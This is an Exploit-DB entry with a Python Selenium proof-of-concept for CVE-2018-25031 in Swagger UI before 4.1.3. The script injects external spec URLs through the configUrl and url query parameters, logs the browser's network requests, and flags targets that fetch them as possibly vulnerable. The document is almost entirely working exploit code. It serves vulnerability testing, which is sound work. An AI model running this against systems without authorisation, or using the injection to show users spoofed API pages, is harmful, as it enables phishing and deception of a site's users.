source link: https://www.exploit-db.com/exploits/51379
Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
EDB-ID: 51379
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

# Spec locations the victim browser must never be sent to fetch. Swagger UI
# before 4.1.3 loads whatever the configUrl / url query parameters point at,
# so an attacker-controlled API definition is rendered under the trusted
# site's own origin.
CONFIG_URL = "https://petstore.swagger.io/v2/hacked1.json"
SPEC_URL = "https://petstore.swagger.io/v2/hacked2.json"

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python swagger-exploit.py https://[swagger-page].com")
        sys.exit(1)
    target = sys.argv[1]

    options = webdriver.ChromeOptions()
    options.add_argument("--headless")
    options.add_argument("--ignore-certificate-errors")
    options.add_argument("--log-level=3")
    options.add_experimental_option("excludeSwitches", ["enable-logging"])
    # Enable the DevTools performance log so every network request the page
    # makes is recorded. Setting it on the options object replaces the
    # desired_capabilities argument, which newer Selenium 4 releases removed.
    options.set_capability("goog:loggingPrefs", {"performance": "ALL"})

    # Browser webdriver path
    drive_service = Service("C:/chromedriver.exe")
    driver = webdriver.Chrome(service=drive_service, options=options)

    # Load the page once per injectable parameter and give the UI time to
    # fetch whatever definition it was pointed at.
    driver.get(target + "?configUrl=" + CONFIG_URL)
    time.sleep(10)
    driver.get(target + "?url=" + SPEC_URL)
    time.sleep(10)

    # Keep only the network events from the performance log.
    logs = []
    for log in driver.get_log("performance"):
        message = json.loads(log["message"])["message"]
        if ("Network.response" in message["method"]
                or "Network.request" in message["method"]
                or "Network.webSocket" in message["method"]):
            logs.append(message)
    driver.quit()

    # Save the captured events for manual review.
    with open("log_file.json", "w", encoding="utf-8") as f:
        json.dump(logs, f)

    # If the browser actually requested our URLs, Swagger UI honoured the
    # query parameter and a crafted link will display a remote definition.
    for log in logs:
        url = log.get("params", {}).get("request", {}).get("url")
        if url == CONFIG_URL:
            print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
        if url == SPEC_URL:
            print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")